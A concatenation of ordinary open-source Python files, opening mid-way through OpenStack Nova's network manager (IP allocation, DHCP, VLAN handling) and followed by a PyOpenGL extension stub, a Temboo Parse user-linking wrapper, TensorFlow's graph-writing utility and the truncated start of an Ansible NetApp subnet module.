subnet_dict['dhcp_server'] = dhcp_server
subnet_object = network_model.Subnet(**subnet_dict)
# add dns info
for k in ['dns1', 'dns2']:
if subnet.get(k):
subnet_object.add_dns(
network_model.IP(address=subnet[k], type='dns'))
# get the routes for this subnet
# NOTE(tr3buchet): default route comes from subnet gateway
if subnet.get('id'):
routes = self.ipam.get_routes_by_ip_block(context,
subnet['id'], network['project_id'])
for route in routes:
cidr = netaddr.IPNetwork('%s/%s' % (route['destination'],
route['netmask'])).cidr
subnet_object.add_route(
network_model.Route(cidr=str(cidr),
gateway=network_model.IP(
address=route['gateway'],
type='gateway')))
subnets.append(subnet_object)
return subnets
def _allocate_mac_addresses(self, context, instance_uuid, networks):
"""Generates mac addresses and creates vif rows in db for them."""
for network in networks:
self.add_virtual_interface(context, instance_uuid, network['id'])
def add_virtual_interface(self, context, instance_uuid, network_id):
vif = {'address': utils.generate_mac_address(),
'instance_uuid': instance_uuid,
'network_id': network_id,
'uuid': str(utils.gen_uuid())}
# try FLAG times to create a vif record with a unique mac_address
for i in xrange(FLAGS.create_unique_mac_address_attempts):
try:
return self.db.virtual_interface_create(context, vif)
except exception.VirtualInterfaceCreateException:
vif['address'] = utils.generate_mac_address()
else:
self.db.virtual_interface_delete_by_instance(context,
instance_uuid)
raise exception.VirtualInterfaceMacAddressException()
@wrap_check_policy
def add_fixed_ip_to_instance(self, context, instance_id, host, network_id):
"""Adds a fixed ip to an instance from specified network."""
if utils.is_uuid_like(network_id):
network = self.get_network(context, network_id)
else:
network = self._get_network_by_id(context, network_id)
self._allocate_fixed_ips(context, instance_id, host, [network])
@wrap_check_policy
def remove_fixed_ip_from_instance(self, context, instance_id, host,
address):
"""Removes a fixed ip from an instance from specified network."""
fixed_ips = self.db.fixed_ip_get_by_instance(context, instance_id)
for fixed_ip in fixed_ips:
if fixed_ip['address'] == address:
self.deallocate_fixed_ip(context, address, host)
return
raise exception.FixedIpNotFoundForSpecificInstance(
instance_id=instance_id, ip=address)
def _validate_instance_zone_for_dns_domain(self, context, instance):
instance_zone = instance.get('availability_zone')
if not self.instance_dns_domain:
return True
instance_domain = self.instance_dns_domain
domainref = self.db.dnsdomain_get(context, instance_zone)
dns_zone = domainref.availability_zone
if dns_zone and (dns_zone != instance_zone):
LOG.warn(_('instance-dns-zone is |%(domain)s|, '
'which is in availability zone |%(zone)s|. '
'Instance is in zone |%(zone2)s|. '
'No DNS record will be created.'),
{'domain': instance_domain,
'zone': dns_zone,
'zone2': instance_zone},
instance=instance)
return False
else:
return True
def allocate_fixed_ip(self, context, instance_id, network, **kwargs):
"""Gets a fixed ip from the pool."""
# TODO(vish): when this is called by compute, we can associate compute
# with a network, or a cluster of computes with a network
# and use that network here with a method like
# network_get_by_compute_host
address = None
instance_ref = self.db.instance_get(context, instance_id)
if network['cidr']:
address = kwargs.get('address', None)
if address:
address = self.db.fixed_ip_associate(context,
address,
instance_ref['uuid'],
network['id'])
else:
address = self.db.fixed_ip_associate_pool(context.elevated(),
network['id'],
instance_ref['uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance_id)
get_vif = self.db.virtual_interface_get_by_instance_and_network
vif = get_vif(context, instance_ref['uuid'], network['id'])
values = {'allocated': True,
'virtual_interface_id': vif['id']}
self.db.fixed_ip_update(context, address, values)
name = instance_ref['display_name']
if self._validate_instance_zone_for_dns_domain(context, instance_ref):
uuid = instance_ref['uuid']
self.instance_dns_manager.create_entry(name, address,
"A",
self.instance_dns_domain)
self.instance_dns_manager.create_entry(uuid, address,
"A",
self.instance_dns_domain)
self._setup_network_on_host(context, network)
return address
def deallocate_fixed_ip(self, context, address, **kwargs):
"""Returns a fixed ip to the pool."""
fixed_ip_ref = self.db.fixed_ip_get_by_address(context, address)
vif_id = fixed_ip_ref['virtual_interface_id']
instance = self.db.instance_get_by_uuid(context,
fixed_ip_ref['instance_uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance['uuid'])
if self._validate_instance_zone_for_dns_domain(context, instance):
for n in self.instance_dns_manager.get_entries_by_address(address,
self.instance_dns_domain):
self.instance_dns_manager.delete_entry(n,
self.instance_dns_domain)
network = self._get_network_by_id(context, fixed_ip_ref['network_id'])
self._teardown_network_on_host(context, network)
if FLAGS.force_dhcp_release:
dev = self.driver.get_dev(network)
# NOTE(vish): The below errors should never happen, but there may
# be a race condition that is causing them per
# https://code.launchpad.net/bugs/968457, so we log
# an error to help track down the possible race.
msg = _("Unable to release %s because vif doesn't exist.")
if not vif_id:
LOG.error(msg % address)
return
vif = self.db.virtual_interface_get(context, vif_id)
if not vif:
LOG.error(msg % address)
return
# NOTE(vish): This forces a packet so that the release_fixed_ip
# callback will get called by nova-dhcpbridge.
self.driver.release_dhcp(dev, address, vif['address'])
self.db.fixed_ip_update(context, address,
{'allocated': False,
'virtual_interface_id': None})
def lease_fixed_ip(self, context, address):
"""Called by dhcp-bridge when ip is leased."""
LOG.debug(_('Leased IP |%(address)s|'), locals(), context=context)
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
if fixed_ip['instance_uuid'] is None:
msg = _('IP %s leased that is not associated') % address
raise exception.NovaException(msg)
now = timeutils.utcnow()
self.db.fixed_ip_update(context,
fixed_ip['address'],
{'leased': True,
'updated_at': now})
if not fixed_ip['allocated']:
LOG.warn(_('IP |%s| leased that isn\'t allocated'), address,
context=context)
def release_fixed_ip(self, context, address):
"""Called by dhcp-bridge when ip is released."""
LOG.debug(_('Released IP |%(address)s|'), locals(), context=context)
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
if fixed_ip['instance_uuid'] is None:
msg = _('IP %s released that is not associated') % address
raise exception.NovaException(msg)
if not fixed_ip['leased']:
LOG.warn(_('IP %s released that was not leased'), address,
context=context)
self.db.fixed_ip_update(context,
fixed_ip['address'],
{'leased': False})
if not fixed_ip['allocated']:
self.db.fixed_ip_disassociate(context, address)
def create_networks(self, context, label, cidr, multi_host, num_networks,
network_size, cidr_v6, gateway, gateway_v6, bridge,
bridge_interface, dns1=None, dns2=None,
fixed_cidr=None, **kwargs):
"""Create networks based on parameters."""
# NOTE(jkoelker): these are dummy values to make sure iter works
# TODO(tr3buchet): disallow carving up networks
fixed_net_v4 = netaddr.IPNetwork('0/32')
fixed_net_v6 = netaddr.IPNetwork('::0/128')
subnets_v4 = []
subnets_v6 = []
if kwargs.get('ipam'):
if cidr_v6:
subnets_v6 = [netaddr.IPNetwork(cidr_v6)]
if cidr:
subnets_v4 = [netaddr.IPNetwork(cidr)]
else:
subnet_bits = int(math.ceil(math.log(network_size, 2)))
if cidr_v6:
fixed_net_v6 = netaddr.IPNetwork(cidr_v6)
prefixlen_v6 = 128 - subnet_bits
subnets_v6 = fixed_net_v6.subnet(prefixlen_v6,
count=num_networks)
if cidr:
fixed_net_v4 = netaddr.IPNetwork(cidr)
prefixlen_v4 = 32 - subnet_bits
subnets_v4 = list(fixed_net_v4.subnet(prefixlen_v4,
count=num_networks))
if cidr:
# NOTE(jkoelker): This replaces the _validate_cidrs call and
# prevents looping multiple times
try:
nets = self.db.network_get_all(context)
except exception.NoNetworksFound:
nets = []
used_subnets = [netaddr.IPNetwork(net['cidr']) for net in nets]
def find_next(subnet):
next_subnet = subnet.next()
while next_subnet in subnets_v4:
next_subnet = next_subnet.next()
if next_subnet in fixed_net_v4:
return next_subnet
for subnet in list(subnets_v4):
if subnet in used_subnets:
next_subnet = find_next(subnet)
if next_subnet:
subnets_v4.remove(subnet)
subnets_v4.append(next_subnet)
subnet = next_subnet
else:
raise ValueError(_('cidr already in use'))
for used_subnet in used_subnets:
if subnet in used_subnet:
msg = _('requested cidr (%(cidr)s) conflicts with '
'existing supernet (%(super)s)')
raise ValueError(msg % {'cidr': subnet,
'super': used_subnet})
if used_subnet in subnet:
next_subnet = find_next(subnet)
if next_subnet:
subnets_v4.remove(subnet)
subnets_v4.append(next_subnet)
subnet = next_subnet
else:
msg = _('requested cidr (%(cidr)s) conflicts '
'with existing smaller cidr '
'(%(smaller)s)')
raise ValueError(msg % {'cidr': subnet,
'smaller': used_subnet})
networks = []
subnets = itertools.izip_longest(subnets_v4, subnets_v6)
for index, (subnet_v4, subnet_v6) in enumerate(subnets):
net = {}
net['bridge'] = bridge
net['bridge_interface'] = bridge_interface
net['multi_host'] = multi_host
net['dns1'] = dns1
net['dns2'] = dns2
net['project_id'] = kwargs.get('project_id')
if num_networks > 1:
net['label'] = '%s_%d' % (label, index)
else:
net['label'] = label
if cidr and subnet_v4:
net['cidr'] = str(subnet_v4)
net['netmask'] = str(subnet_v4.netmask)
net['gateway'] = gateway or str(subnet_v4[1])
net['broadcast'] = str(subnet_v4.broadcast)
net['dhcp_start'] = str(subnet_v4[2])
if cidr_v6 and subnet_v6:
net['cidr_v6'] = str(subnet_v6)
if gateway_v6:
# use a pre-defined gateway if one is provided
net['gateway_v6'] = str(gateway_v6)
else:
net['gateway_v6'] = str(subnet_v6[1])
net['netmask_v6'] = str(subnet_v6._prefixlen)
if kwargs.get('vpn', False):
# this bit here is for vlan-manager
del net['dns1']
del net['dns2']
vlan = kwargs['vlan_start'] + index
net['vpn_private_address'] = str(subnet_v4[2])
net['dhcp_start'] = str(subnet_v4[3])
net['vlan'] = vlan
net['bridge'] = 'br%s' % vlan
# NOTE(vish): This makes ports unique across the cloud, a more
# robust solution would be to make them uniq per ip
net['vpn_public_port'] = kwargs['vpn_start'] + index
# None if network with cidr or cidr_v6 already exists
network = self.db.network_create_safe(context, net)
if not network:
raise ValueError(_('Network already exists!'))
else:
networks.append(network)
if network and cidr and subnet_v4:
self._create_fixed_ips(context, network['id'], fixed_cidr)
return networks
@wrap_check_policy
def delete_network(self, context, fixed_range, uuid,
require_disassociated=True):
# Prefer uuid but we'll also take cidr for backwards compatibility
elevated = context.elevated()
if uuid:
network = self.db.network_get_by_uuid(elevated, uuid)
elif fixed_range:
network = self.db.network_get_by_cidr(elevated, fixed_range)
if require_disassociated and network.project_id is not None:
raise ValueError(_('Network must be disassociated from project %s'
' before delete') % network.project_id)
self.db.network_delete_safe(context, network.id)
@property
def _bottom_reserved_ips(self): # pylint: disable=R0201
"""Number of reserved ips at the bottom of the range."""
return 2 # network, gateway
@property
def _top_reserved_ips(self): # pylint: disable=R0201
"""Number of reserved ips at the top of the range."""
return 1 # broadcast
def _create_fixed_ips(self, context, network_id, fixed_cidr=None):
"""Create all fixed ips for network."""
network = self._get_network_by_id(context, network_id)
# NOTE(vish): Should these be properties of the network as opposed
# to properties of the manager class?
bottom_reserved = self._bottom_reserved_ips
top_reserved = self._top_reserved_ips
if not fixed_cidr:
fixed_cidr = netaddr.IPNetwork(network['cidr'])
num_ips = len(fixed_cidr)
ips = []
for index in range(num_ips):
address = str(fixed_cidr[index])
if index < bottom_reserved or num_ips - index <= top_reserved:
reserved = True
else:
reserved = False
ips.append({'network_id': network_id,
'address': address,
'reserved': reserved})
self.db.fixed_ip_bulk_create(context, ips)
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
raise NotImplementedError()
def setup_networks_on_host(self, context, instance_id, host,
teardown=False):
"""calls setup/teardown on network hosts associated with an instance"""
green_pool = greenpool.GreenPool()
if teardown:
call_func = self._teardown_network_on_host
else:
call_func = self._setup_network_on_host
instance = self.db.instance_get(context, instance_id)
vifs = self.db.virtual_interface_get_by_instance(context,
instance['uuid'])
for vif in vifs:
network = self.db.network_get(context, vif['network_id'])
fixed_ips = self.db.fixed_ips_by_virtual_interface(context,
vif['id'])
if not network['multi_host']:
#NOTE (tr3buchet): if using multi_host, host is instance[host]
host = network['host']
if self.host == host or host is None:
# at this point i am the correct host, or host doesn't
# matter -> FlatManager
call_func(context, network)
else:
# i'm not the right host, run call on correct host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {'network_id': network['id'], 'teardown': teardown}
# NOTE(tr3buchet): the call is just to wait for completion
green_pool.spawn_n(rpc.call, context, topic,
{'method': 'rpc_setup_network_on_host',
'args': args})
# wait for all of the setups (if any) to finish
green_pool.waitall()
def rpc_setup_network_on_host(self, context, network_id, teardown):
if teardown:
call_func = self._teardown_network_on_host
else:
call_func = self._setup_network_on_host
# subcall from original setup_networks_on_host
network = self.db.network_get(context, network_id)
call_func(context, network)
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
raise NotImplementedError()
def _teardown_network_on_host(self, context, network):
"""Sets up network on this host."""
raise NotImplementedError()
@wrap_check_policy
def validate_networks(self, context, networks):
"""check if the networks exists and host
is set to each network.
"""
if networks is None or len(networks) == 0:
return
network_uuids = [uuid for (uuid, fixed_ip) in networks]
self._get_networks_by_uuids(context, network_uuids)
for network_uuid, address in networks:
# check if the fixed IP address is valid and
# it actually belongs to the network
if address is not None:
if not utils.is_valid_ipv4(address):
raise exception.FixedIpInvalid(address=address)
fixed_ip_ref = self.db.fixed_ip_get_by_address(context,
address)
network = self._get_network_by_id(context,
fixed_ip_ref['network_id'])
if network['uuid'] != network_uuid:
raise exception.FixedIpNotFoundForNetwork(
address=address, network_uuid=network_uuid)
if fixed_ip_ref['instance_uuid'] is not None:
raise exception.FixedIpAlreadyInUse(
address=address,
instance_uuid=fixed_ip_ref['instance_uuid'])
def _get_network_by_id(self, context, network_id):
return self.db.network_get(context, network_id)
def _get_networks_by_uuids(self, context, network_uuids):
return self.db.network_get_all_by_uuids(context, network_uuids)
@wrap_check_policy
def get_vifs_by_instance(self, context, instance_id):
"""Returns the vifs associated with an instance"""
instance = self.db.instance_get(context, instance_id)
vifs = self.db.virtual_interface_get_by_instance(context,
instance['uuid'])
return [dict(vif.iteritems()) for vif in vifs]
def get_instance_id_by_floating_address(self, context, address):
"""Returns the instance id a floating ip's fixed ip is allocated to"""
floating_ip = self.db.floating_ip_get_by_address(context, address)
if floating_ip['fixed_ip_id'] is None:
return None
fixed_ip = self.db.fixed_ip_get(context, floating_ip['fixed_ip_id'])
# NOTE(tr3buchet): this can be None
# NOTE(mikal): we need to return the instance id here because its used
# by ec2 (and possibly others)
uuid = fixed_ip['instance_uuid']
if not uuid:
return uuid
instance = self.db.instance_get_by_uuid(context, uuid)
return instance['id']
@wrap_check_policy
def get_network(self, context, network_uuid):
network = self.db.network_get_by_uuid(context.elevated(), network_uuid)
return dict(network.iteritems())
@wrap_check_policy
def get_all_networks(self, context):
try:
networks = self.db.network_get_all(context)
except exception.NoNetworksFound:
return []
return [dict(network.iteritems()) for network in networks]
@wrap_check_policy
def disassociate_network(self, context, network_uuid):
network = self.get_network(context, network_uuid)
self.db.network_disassociate(context, network['id'])
@wrap_check_policy
def get_fixed_ip(self, context, id):
"""Return a fixed ip"""
fixed = self.db.fixed_ip_get(context, id)
return dict(fixed.iteritems())
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
fixed = self.db.fixed_ip_get_by_address(context, address)
return dict(fixed.iteritems())
def get_vif_by_mac_address(self, context, mac_address):
"""Returns the vifs record for the mac_address"""
return self.db.virtual_interface_get_by_address(context,
mac_address)
class FlatManager(NetworkManager):
"""Basic network where no vlans are used.
FlatManager does not do any bridge or vlan creation. The user is
responsible for setting up whatever bridges are specified when creating
networks through nova-manage. This bridge needs to be created on all
compute hosts.
The idea is to create a single network for the host with a command like:
nova-manage network create 192.168.0.0/24 1 256. Creating multiple
networks for for one manager is currently not supported, but could be
added by modifying allocate_fixed_ip and get_network to get the a network
with new logic instead of network_get_by_bridge. Arbitrary lists of
addresses in a single network can be accomplished with manual db editing.
If flat_injected is True, the compute host will attempt to inject network
config into the guest. It attempts to modify /etc/network/interfaces and
currently only works on debian based systems. To support a wider range of
OSes, some other method may need to be devised to let the guest know which
ip it should be using so that it can configure itself. Perhaps an attached
disk or serial device with configuration info.
Metadata forwarding must be handled by the gateway, and since nova does
not do any setup in this mode, it must be done manually. Requests to
169.254.169.254 port 80 will need to be forwarded to the api server.
"""
timeout_fixed_ips = False
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
requested_networks = kwargs.get('requested_networks')
for network in networks:
address = None
if requested_networks is not None:
for address in (fixed_ip for (uuid, fixed_ip) in
requested_networks if network['uuid'] == uuid):
break
self.allocate_fixed_ip(context, instance_id,
network, address=address)
def deallocate_fixed_ip(self, context, address, **kwargs):
"""Returns a fixed ip to the pool."""
super(FlatManager, self).deallocate_fixed_ip(context, address,
**kwargs)
self.db.fixed_ip_disassociate(context, address)
def _setup_network_on_host(self, context, network):
"""Setup Network on this host."""
# NOTE(tr3buchet): this does not need to happen on every ip
# allocation, this functionality makes more sense in create_network
# but we'd have to move the flat_injected flag to compute
net = {}
net['injected'] = FLAGS.flat_injected
self.db.network_update(context, network['id'], net)
def _teardown_network_on_host(self, context, network):
"""Tear down network on this host."""
pass
# NOTE(justinsb): The floating ip functions are stub-implemented.
# We were throwing an exception, but this was messing up horizon.
# Timing makes it difficult to implement floating ips here, in Essex.
@wrap_check_policy
def get_floating_ip(self, context, id):
"""Returns a floating IP as a dict"""
return None
@wrap_check_policy
def get_floating_pools(self, context):
"""Returns list of floating pools"""
return {}
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
"""Returns a floating IP as a dict"""
return None
@wrap_check_policy
def get_floating_ips_by_project(self, context):
"""Returns the floating IPs allocated to a project"""
return []
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
"""Returns the floating IPs associated with a fixed_address"""
return []
class FlatDHCPManager(RPCAllocateFixedIP, FloatingIP, NetworkManager):
"""Flat networking with dhcp.
FlatDHCPManager will start up one dhcp server to give out addresses.
It never injects network settings into the guest. It also manages bridges.
Otherwise it behaves like FlatManager.
"""
SHOULD_CREATE_BRIDGE = True
DHCP = True
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
self.l3driver.initialize()
super(FlatDHCPManager, self).init_host()
self.init_host_floating_ips()
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
network['dhcp_server'] = self._get_dhcp_ip(context, network)
self.l3driver.initialize_gateway(network)
if not FLAGS.fake_network:
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
if(FLAGS.use_ipv6):
self.driver.update_ra(context, dev, network)
gateway = utils.get_my_linklocal(dev)
self.db.network_update(context, network['id'],
{'gateway_v6': gateway})
def _teardown_network_on_host(self, context, network):
if not FLAGS.fake_network:
network['dhcp_server'] = self._get_dhcp_ip(context, network)
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
def _get_network_by_id(self, context, network_id):
return NetworkManager._get_network_by_id(self, context.elevated(),
network_id)
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = super(FlatDHCPManager, self)._get_network_dict(network)
# get flat dhcp specific fields
if self.SHOULD_CREATE_BRIDGE:
network_dict['should_create_bridge'] = self.SHOULD_CREATE_BRIDGE
if network.get('bridge_interface'):
network_dict['bridge_interface'] = network['bridge_interface']
if network.get('multi_host'):
network_dict['multi_host'] = network['multi_host']
return network_dict
class VlanManager(RPCAllocateFixedIP, FloatingIP, NetworkManager):
"""Vlan network with dhcp.
VlanManager is the most complicated. It will create a host-managed
vlan for each project. Each project gets its own subnet. The networks
and associated subnets are created with nova-manage using a command like:
nova-manage network create 10.0.0.0/8 3 16. This will create 3 networks
of 16 addresses from the beginning of the 10.0.0.0 range.
A dhcp server is run for each subnet, so each project will have its own.
For this mode to be useful, each project will need a vpn to access the
instances in its subnet.
"""
SHOULD_CREATE_BRIDGE = True
SHOULD_CREATE_VLAN = True
DHCP = True
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
self.l3driver.initialize()
NetworkManager.init_host(self)
self.init_host_floating_ips()
def allocate_fixed_ip(self, context, instance_id, network, **kwargs):
"""Gets a fixed ip from the pool."""
instance = self.db.instance_get(context, instance_id)
if kwargs.get('vpn', None):
address = network['vpn_private_address']
self.db.fixed_ip_associate(context,
address,
instance['uuid'],
network['id'],
reserved=True)
else:
address = kwargs.get('address', None)
if address:
address = self.db.fixed_ip_associate(context, address,
instance['uuid'],
network['id'])
else:
address = self.db.fixed_ip_associate_pool(context,
network['id'],
instance['uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance_id)
vif = self.db.virtual_interface_get_by_instance_and_network(
context, instance['uuid'], network['id'])
values = {'allocated': True,
'virtual_interface_id': vif['id']}
self.db.fixed_ip_update(context, address, values)
self._setup_network_on_host(context, network)
return address
@wrap_check_policy
def add_network_to_project(self, context, project_id):
"""Force adds another network to a project."""
self.db.network_associate(context, project_id, force=True)
def _get_networks_for_instance(self, context, instance_id, project_id,
requested_networks=None):
"""Determine which networks an instance should connect to."""
# get networks associated with project
if requested_networks is not None and len(requested_networks) != 0:
network_uuids = [uuid for (uuid, fixed_ip) in requested_networks]
networks = self.db.network_get_all_by_uuids(context,
network_uuids,
project_id)
else:
networks = self.db.project_get_networks(context, project_id)
return networks
def create_networks(self, context, **kwargs):
"""Create networks based on parameters."""
# Check that num_networks + vlan_start is not > 4094, fixes lp708025
if kwargs['num_networks'] + kwargs['vlan_start'] > 4094:
raise ValueError(_('The sum between the number of networks and'
' the vlan start cannot be greater'
' than 4094'))
# check that num networks and network size fits in fixed_net
fixed_net = netaddr.IPNetwork(kwargs['cidr'])
if len(fixed_net) < kwargs['num_networks'] * kwargs['network_size']:
raise ValueError(_('The network range is not big enough to fit '
'%(num_networks)s. Network size is %(network_size)s') %
kwargs)
return NetworkManager.create_networks(
self, context, vpn=True, **kwargs)
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
if not network['vpn_public_address']:
net = {}
address = FLAGS.vpn_ip
net['vpn_public_address'] = address
network = self.db.network_update(context, network['id'], net)
else:
address = network['vpn_public_address']
network['dhcp_server'] = self._get_dhcp_ip(context, network)
self.l3driver.initialize_gateway(network)
# NOTE(vish): only ensure this forward if the address hasn't been set
# manually.
if address == FLAGS.vpn_ip and hasattr(self.driver,
"ensure_vpn_forward"):
self.l3driver.add_vpn(FLAGS.vpn_ip,
network['vpn_public_port'],
network['vpn_private_address'])
if not FLAGS.fake_network:
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
if(FLAGS.use_ipv6):
self.driver.update_ra(context, dev, network)
gateway = utils.get_my_linklocal(dev)
self.db.network_update(context, network['id'],
{'gateway_v6': gateway})
def _teardown_network_on_host(self, context, network):
if not FLAGS.fake_network:
network['dhcp_server'] = self._get_dhcp_ip(context, network)
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
def _get_networks_by_uuids(self, context, network_uuids):
return self.db.network_get_all_by_uuids(context, network_uuids,
context.project_id)
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = super(VlanManager, self)._get_network_dict(network)
# get vlan specific network fields
if self.SHOULD_CREATE_BRIDGE:
network_dict['should_create_bridge'] = self.SHOULD_CREATE_BRIDGE
if self.SHOULD_CREATE_VLAN:
network_dict['should_create_vlan'] = self.SHOULD_CREATE_VLAN
for k in ['vlan', 'bridge_interface', 'multi_host']:
if network.get(k):
network_dict[k] = network[k]
return network_dict
@property
def _bottom_reserved_ips(self):
"""Number of reserved ips at the bottom of the range."""
return super(VlanManager, self)._bottom_reserved_ips + 1 # vpn server
@property
def _top_reserved_ips(self):
"""Number of reserved ips at the top of the range."""
parent_reserved = super(VlanManager, self)._top_reserved_ips
return parent_reserved + FLAGS.cnt_vpn_clients
|
kenshay/ImageScript | refs/heads/master | ProgramData/SystemFiles/Python/Lib/site-packages/OpenGL/GLES2/NV/shadow_samplers_array.py | 8 | '''OpenGL extension NV.shadow_samplers_array
This module customises the behaviour of the
OpenGL.raw.GLES2.NV.shadow_samplers_array to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/NV/shadow_samplers_array.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.shadow_samplers_array import *
from OpenGL.raw.GLES2.NV.shadow_samplers_array import _EXTENSION_NAME
def glInitShadowSamplersArrayNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
willprice/arduino-sphere-project | refs/heads/master | scripts/example_direction_finder/temboo/Library/Parse/Users/LinkExistingUser.py | 5 | # -*- coding: utf-8 -*-
###############################################################################
#
# LinkExistingUser
# Allows your application to link an existing user with a service like Facebook or Twitter.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class LinkExistingUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the LinkExistingUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(LinkExistingUser, self).__init__(temboo_session, '/Library/Parse/Users/LinkExistingUser')
def new_input_set(self):
return LinkExistingUserInputSet()
def _make_result_set(self, result, path):
return LinkExistingUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return LinkExistingUserChoreographyExecution(session, exec_id, path)
class LinkExistingUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the LinkExistingUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AuthData(self, value):
"""
Set the value of the AuthData input for this Choreo. ((required, json) A JSON string containing the authentication data of the user you want to link with another service. See documentation for more formatting details.)
"""
super(LinkExistingUserInputSet, self)._set_input('AuthData', value)
def set_ApplicationID(self, value):
"""
Set the value of the ApplicationID input for this Choreo. ((required, string) The Application ID provided by Parse.)
"""
super(LinkExistingUserInputSet, self)._set_input('ApplicationID', value)
def set_ObjectID(self, value):
"""
Set the value of the ObjectID input for this Choreo. ((required, string) The ID of the user that is being linked to another service.)
"""
super(LinkExistingUserInputSet, self)._set_input('ObjectID', value)
def set_RESTAPIKey(self, value):
"""
Set the value of the RESTAPIKey input for this Choreo. ((required, string) The REST API Key provided by Parse.)
"""
super(LinkExistingUserInputSet, self)._set_input('RESTAPIKey', value)
def set_SessionToken(self, value):
"""
Set the value of the SessionToken input for this Choreo. ((required, string) A valid Session Token. Note that Session Tokens can be retrieved by the Login and SignUp Choreos.)
"""
super(LinkExistingUserInputSet, self)._set_input('SessionToken', value)
class LinkExistingUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the LinkExistingUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Parse.)
"""
return self._output.get('Response', None)
class LinkExistingUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return LinkExistingUserResultSet(response, path)
|
whn09/tensorflow | refs/heads/master | tensorflow/python/framework/graph_io.py | 62 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for reading/writing graphs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
def write_graph(graph_or_graph_def, logdir, name, as_text=True):
"""Writes a graph proto to a file.
The graph is written as a binary proto unless `as_text` is `True`.
```python
v = tf.Variable(0, name='my_variable')
sess = tf.Session()
tf.train.write_graph(sess.graph_def, '/tmp/my-model', 'train.pbtxt')
```
or
```python
v = tf.Variable(0, name='my_variable')
sess = tf.Session()
tf.train.write_graph(sess.graph, '/tmp/my-model', 'train.pbtxt')
```
Args:
graph_or_graph_def: A `Graph` or a `GraphDef` protocol buffer.
logdir: Directory where to write the graph. This can refer to remote
filesystems, such as Google Cloud Storage (GCS).
name: Filename for the graph.
as_text: If `True`, writes the graph as an ASCII proto.
Returns:
The path of the output proto file.
"""
if isinstance(graph_or_graph_def, ops.Graph):
graph_def = graph_or_graph_def.as_graph_def()
else:
graph_def = graph_or_graph_def
# gcs does not have the concept of directory at the moment.
if not file_io.file_exists(logdir) and not logdir.startswith('gs:'):
file_io.recursive_create_dir(logdir)
path = os.path.join(logdir, name)
if as_text:
file_io.atomic_write_string_to_file(path, str(graph_def))
else:
file_io.atomic_write_string_to_file(path, graph_def.SerializeToString())
return path
|
shsingh/ansible | refs/heads/devel | lib/ansible/modules/storage/netapp/na_ontap_net_subnet.py | 20 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = """
module: na_ontap_net_subnet
short_description: NetApp ONTAP Create, delete, modify network subnets.
extends_documentation_fragment:
- netapp.na_ontap
version_added: '2.8'
author: Storage Engineering (@Albinpopote) <[email protected]>
description:
